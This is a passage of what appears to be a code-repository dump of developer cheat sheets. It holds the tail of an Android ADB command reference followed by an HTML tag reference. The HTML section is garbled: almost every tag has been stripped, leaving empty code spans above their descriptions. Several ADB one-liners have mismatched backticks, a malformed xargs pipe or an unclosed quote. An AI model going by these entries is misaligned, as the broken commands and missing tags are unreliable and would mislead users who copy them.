devices` // show devices attached 20 | - `adb devices -l` // devices (product/model) 21 | - `adb connect ip_address_of_device` 22 | 23 | ## Get device android version 24 | - `adb shell getprop ro.build.version.release` 25 | 26 | ## LogCat 27 | - `adb logcat` 28 | - `adb logcat -c` // clear // The parameter -c will clear the current logs on the device. 29 | - `adb logcat -d > [path_to_file]` // Save the logcat output to a file on the local system. 30 | - `adb bugreport > [path_to_file]` // Will dump the whole device information like dumpstate, dumpsys, and logcat output. 31 | 32 | ## Files 33 | - `adb push [source] [destination]` // Copy files from your computer to your phone. 34 | - `adb pull [device file location] [local file location]` // Copy files from your phone to your computer. 35 | 36 | ## App install 37 | - `adb -e install path/to/app.apk` 38 | 39 | -d - directs command to the only connected USB device... 40 | -e - directs command to the only running emulator... 41 | -s ... 42 | -p ... 43 | The flag you decide to use has to come before the actual `adb command: 44 | 45 | - `adb devices | tail -n +2 | cut -sf 1 | xargs -IX - `adb -s X install -r com.myAppPackage` // Install the given app on all connected devices. 46 | 47 | ## Uninstalling app from device 48 | - `adb uninstall com.myAppPackage` 49 | - `adb uninstall ` 50 | - `adb uninstall -k ` -> "Uninstall .apk without deleting data" 51 | 52 | - `adb shell pm uninstall com.example.MyApp` 53 | - `adb shell pm clear [package]` // Deletes all data associated with a package. 54 | 55 | - `adb devices | tail -n +2 | cut -sf 1 | xargs -IX - `adb -s X uninstall com.myAppPackage` // Uninstall the given app from all connected devices 56 | 57 | ## Update app 58 | - `adb install -r yourApp.apk` // -r means re-install the app and keep its data on the device. 59 | - `adb install –k <.apk file path on computer>` 60 | 61 | ## Home button 62 | - `adb shell am start -W -c android.intent.category.HOME -a android.intent.action.MAIN` 63 | 64 | ## Activity Manager 65 | - `adb shell am start -a android.intent.action.VIEW` 66 | - `adb shell am broadcast -a 'my_action'` 67 | 68 | - `adb shell am start -a android.intent.action.CALL -d tel:+972527300294` // Make a call 69 | 70 | // Open send sms screen with phone number and the message: 71 | - `adb shell am start -a android.intent.action.SENDTO -d sms:+972527300294 --es sms_body "Test --ez exit_on_sent false` 72 | 73 | // Reset permissions for an app: 74 | - `adb shell pm reset-permissions PACKAGE_NAME` 75 | 76 | ## Emulator 77 | - `adb emu kill` 78 | - `adb emu kill-all` 79 | - `adb emu ping` 80 | - `adb emu avd name` 81 | - `adb -s emulator-5556 emu avd name` 82 | 83 | ## WiFi 84 | - `adb shell svc wifi enable` 85 | - `adb shell svc wifi disable` 86 | 87 | ## Battery 88 | - `adb shell dumpsys battery set level 50` // Set battery level to 50% 89 | 90 | ## Screen Capture 91 | - `adb shell screencap -p /sdcard/screenshot.png` // Capture screen and save to file 92 | - `adb pull /sdcard/screenshot.png` // Copy file from device to computer 93 | 94 | ## Package Manager 95 | - `adb shell pm list packages` 96 | - `adb shell pm list packages -f` // include the full path to the APK. 97 | 98 | ## SQLite database 99 | - `adb shell sqlite3 /data/data/package_name/databases/database_name.db` // Open database shell 100 | 101 | ## Monkey 102 | - `adb shell monkey -p your.package.name -v 500` // Send 500 pseudo-random events to your app 103 | 104 | ## Backup and Restore 105 | - `adb backup -f backup.ab -apk com.example.app` // Backup the app and its data 106 | - `adb restore backup.ab` // Restore the app and its data from the backup file 107 | 108 | ## Miscellaneous 109 | - `adb shell input keyevent 26` // Press the power button 110 | - `adb shell input keyevent 82` // Press the menu button 111 | - `adb shell input text "Hello World"` // Input text on the device 112 | 113 | ## Resources 114 | - [ADB Cheat Sheet](https://devhints.io/adb) 115 | 116 | ## Note 117 | - Replace `[source]`, `[destination]`, `[path_to_file]`, `[device file location]`, `[local file location]`, `[app .apk name]`, `[package]`, `[.apk file path on computer]`, `com.myAppPackage`, `yourApp.apk`, `PACKAGE_NAME`, `your.package.name`, `backup.ab`, `com.example.app` with the actual values in your specific use case. 118 | -------------------------------------------------------------------------------- /web/html-cheatsheet.md: -------------------------------------------------------------------------------- 1 | # HTML Cheatsheet 2 | 3 | ## Basic Tags 4 | 5 | ` ` 6 | Creates an HTML document 7 | 8 | ` ` 9 | Sets off the title & other info that isn't displayed 10 | 11 | ` ` 12 | Sets off the visible portion of the document 13 | 14 | ` ` 15 | Puts name of the document in the title bar; when bookmarking pages, this is what is bookmarked 16 | 17 | ## Body attributes (only used in email newsletters) 18 | 19 | `` 20 | Sets background color, using name or hex value 21 | 22 | `` 23 | Sets text color, using name or hex value 24 | 25 | `` 26 | Sets color of links, using name or hex value 27 | 28 | `` 29 | Sets color of visited links, using name or hex value 30 | 31 | `` 32 | Sets color of active links (while mouse-clicking) 33 | 34 | ## Text Tags 35 | 36 | `
` 37 | Creates preformatted text 38 | 39 | `

` to `
` 40 | Creates headlines -- H1=largest, H6=smallest 41 | 42 | ` ` 43 | Creates bold text (should use `` instead) 44 | 45 | ` ` 46 | Creates italicized text (should use `` instead) 47 | 48 | ` ` 49 | Creates typewriter-style text 50 | 51 | ` ` 52 | Used to define source code, usually monospace 53 | 54 | ` ` 55 | Creates a citation, usually processed in italics 56 | 57 | `
` 58 | Creates address section, usually processed in italics 59 | 60 | ` ` 61 | Emphasizes a word (usually processed in italics) 62 | 63 | ` ` 64 | Emphasizes a word (usually processed in bold) 65 | 66 | ` ` 67 | Sets size of font - 1 to 7 (should use CSS instead) 68 | 69 | ` ` 70 | Sets font color (should use CSS instead) 71 | 72 | ` ` 73 | Defines the font used (should use CSS instead) 74 | 75 | ## Links 76 | 77 | `clickable text` 78 | Creates a hyperlink to a Uniform Resource Locator 79 | 80 | `clickable text` 81 | Creates a hyperlink to an email address 82 | 83 | `` 84 | Creates a target location within a document 85 | 86 | `clickable text` 87 | Creates a link to that target location 88 | 89 | ## Formatting 90 | 91 | `

` 92 | Creates a new paragraph 93 | 94 | `
` 95 | Inserts a line break (carriage return) 96 | 97 | `
` 98 | Puts content in a quote - indents text from both sides 99 | 100 | `
` 101 | Used to format block content with CSS 102 | 103 | ` ` 104 | Used to format inline content with CSS 105 | 106 | ## Lists 107 | 108 | `
` 109 | Creates an unordered list 110 | 111 | `
` 112 | Creates an ordered list (start=xx, where xx is a counting number) 113 | 114 | `
    • ` 115 | Encompasses each list item 116 | 117 | `
    ` 118 | Creates a definition list 119 | 120 | `
    ` 121 | Precedes each definition term 122 | 123 | `
    ` 124 | Precedes each definition 125 | 126 | ## Graphical elements 127 | 128 | `
    ` 129 | Inserts a horizontal rule 130 | 131 | `
    ` 132 | Sets size (height) of horizontal rule 133 | 134 | `
    ` 135 | Sets width of rule (as a % or absolute pixel length) 136 | 137 | `
    ` 138 | Creates a horizontal rule without a shadow 139 | 140 | `` 141 | Adds image; it is a separate file located at the URL 142 | 143 | `` 144 | Aligns image left/right/center/bottom/top/middle (use CSS) 145 | 146 | `` 147 | Sets size of border surrounding image (use CSS) 148 | 149 | `` 150 | Sets height of image, in pixels 151 | 152 | `` 153 | Sets width of image, in pixels 154 | 155 | `?` 156 | Sets the alternate text for browsers that can't process images (required by the ADA) 157 | 158 | ## Forms 159 | 160 | `
    ` 161 | Defines a form 162 | 163 | `` 164 | Creates a scrolling menu. Size sets the number of menu items visible before user needs to scroll. 165 | 166 | `` 167 | Creates a pulldown menu 168 | 169 | `